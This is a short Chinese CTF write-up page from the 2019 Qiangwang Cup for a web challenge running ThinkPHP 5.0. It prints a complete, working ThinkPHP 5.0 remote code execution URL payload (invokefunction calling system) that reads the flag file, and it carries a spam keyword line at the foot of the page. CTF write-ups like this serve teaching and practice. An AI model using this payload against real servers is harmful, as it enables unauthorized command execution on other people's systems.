<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    2019強網杯-Writeup
    展開或關閉
    web
    UPLOAD 高明的黑客 強網先鋒-上單 隨便注 babywebbb
    crypto
    Randomstudy BABYBANK babybet
    pwn
    匯總
    re
    JustRe

    強網先鋒-上單

    2019強網杯-Writeup /

    強網先鋒-上單

    知識點:通用組件已知漏洞熟悉度- -?

    1.打開靶機,發現似乎可以遍歷目錄。

    2.點進去看看,似乎是 ThinkPHP。

    3.看看 Readme,似乎是 ThinkPHP 5.0?

    4.直接上次去防災打比賽的 payload 一把梭。

    /1/public/index?s=index/think%5Capp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=cat%20/flag

    1. Flag 到手~

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    GQQQy
    資深作者 200 聲望
    老年二進制選手,副業虛擬機
    討論數量: 0
    只看當前版本


    暫無話題~
    ? 2021 WANGAN.COM 幫助網安從業者成長;關注產業發展,做網絡安全忠誠衛士!
    亚洲 欧美 自拍 唯美 另类